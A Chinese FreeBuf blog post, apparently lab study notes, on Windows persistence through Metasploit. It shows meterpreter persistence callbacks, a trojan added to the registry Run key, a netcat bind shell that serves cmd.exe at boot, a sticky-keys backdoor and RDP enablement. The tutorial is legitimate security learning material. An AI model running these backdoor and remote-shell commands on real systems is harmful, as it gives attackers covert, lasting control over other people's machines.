freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

内网渗透 day6-msf后门植(windows)
彩虹猛犸233 2020-11-16 13:56:08 243692

后门植入

1. 持续化后门

在提权后的meterpreter下执行persistence命令

wps1

run persistence -i 5 -U -X

-A 自动匹配监听器连接用户

-S 系统开启的时候作为服务自动运行,反弹shell

-U 在用户登入的时候反弹shell

-X 系统开启的时候返回shell

-i 间隔几秒中反弹

-p 指定监听的端口

-r 设定回连的ip


wps2


wps4

win7重启后成功连接

wps5


2. 手动上传木马并加入注册表中

wps6

wps7

wps8

重启后登陆自动连接

wps9

meterpreter > upload qq.exe c:           将木马文件上传到目标机的C盘(可以隐蔽一些)

reg setval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -v shell -d 'c:\qq.exe' -f                     将木马文件写入注册表

reg queryval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -v shell                                  查看


3. 上传nc

wps10

wps11

win7重启后自动开启nc.exe

wps12wps13

upload nc.exe c:

reg add HKLM\software\microsoft\windows\currentversion\run /v shell /d "C:\nc.exe -l -v -v -p 4444 -e c:\windows\system32\cmd.exe"              cmd下运行


4. 开3389-->shift后门-->远程登入

wps14

wps15

wps16

按5次shift调出改过的粘滞键后门

run post/windows/manage/enable_rdp          开启3389端口

rdesktop 192.168.227.128            远程登录


5. at调用

wps18wps19


# 内网渗透 # windows漏洞
本文为 彩虹猛犸233 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
彩虹猛犸233 LV.1
这家伙太懒了,还未填写个人描述!
  • 16 文章数
  • 46 关注者
empire3.6.0版本在执行persistencemiscdebugger*模块时报错解决
2020-11-19
内网渗透 day15-empire提权和后门植入
2020-11-18
内网渗透 day14-empire基础命令的使用
2020-11-17
文章目录